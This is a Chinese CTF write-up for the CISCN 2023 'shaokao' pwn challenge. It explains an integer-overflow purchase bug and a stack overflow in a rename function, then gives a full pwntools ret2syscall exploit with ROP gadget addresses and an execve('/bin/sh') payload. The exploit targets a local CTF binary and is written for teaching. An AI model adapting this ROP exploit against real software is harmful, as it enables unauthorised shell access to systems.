[CISCN 2023 初赛]烧烤摊儿 RedLeaves的WriteUp

NSSIMAGE
存在负数溢出，随便输入点数据只要够承包摊位即可。
当承包摊位后，就有了选项5，改名

改名函数存在栈溢出漏洞，虽然开启了Canary但是并未检查rbp - 0x08的位置，个人理解是体现在没有readfsqword函数。
然后就是经典的ret2syscall，其实还是很简单的，这里有两种做法：

1.自构建ROP链


rdi = 0x40264F
rsi = 0x40A67E
rax = 0x458827
syscall = 0x402404
binsh = 0x04E60F0
rdx = 0x4A404B

定义好所有需要的寄存器，以及/bin/sh\x00字符串的地址，构建ROP链即可。
要注意这个方法我们的Padding必须为b'A' * 0x20而不是b'A' * 0x20 + 0x08
/bin/sh\x00字符串已经充当了那0x08的Padding。


Payload = b'/bin/sh\x00' + Padding + p64(rax) + p64(59) + p64(rdi) + p64(binsh) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(0) + p64(syscall)

name是全局变量，因此地址是固定的。
NSSIMAGE
利用这一点我们可以仅通过一个Payload Getshell。

ROPGadget自动构建ROP链
由于本题是静态链接

可以直接使用ROPGadget构建ROP链，具体命令如下：


ROPGadget --binary shaokao --ropchain

把最后这段复制出来，稍作修改，配合Padding即可GetShell。
NSSIMAGE


from PwnModules import *

io = process('./shaokao')
#io = remote('node2.anna.nssctf.cn', 28778)
elf = ELF('./shaokao')
#libc = ELF('/home/kaguya/PwnTool/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')
context(arch='amd64', os='linux', log_level='debug')


def choice(idx):
    io.recvuntil(b'> ')
    io.sendline(str(idx))


choice(1)
io.sendline(b'1')
io.sendline(b'-99999')
io.sendline(b'3')
io.sendline(b'4')
io.sendline(b'5')

Padding = b'A' * (0x20)

rdi = 0x40264F
rsi = 0x40A67E
rax = 0x458827
syscall = 0x402404
data = 0x04E60F0
rdx = 0x4A404B

Payload = b'/bin/sh\x00' + Padding + p64(rax) + p64(59) + p64(rdi) + p64(data) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(0) + p64(syscall)

# from struct import pack

# Padding goes here
# p = b''
#
# p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e0) # @ .data
# p += pack('<Q', 0x0000000000458827) # pop rax ; ret
# p += b'/bin//sh'
# p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
# p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
# p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
# p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
# p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
# p += pack('<Q', 0x00000000004e60e0) # @ .data
# p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
# p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
# p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
# p += pack('<Q', 0x4141414141414141) # padding
# p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
# p += pack('<Q', 0x0000000000402404) # syscall
# io.sendline(b'A' * (0x20 + 0x08) + p)

io.sendline(Payload)

io.interactive()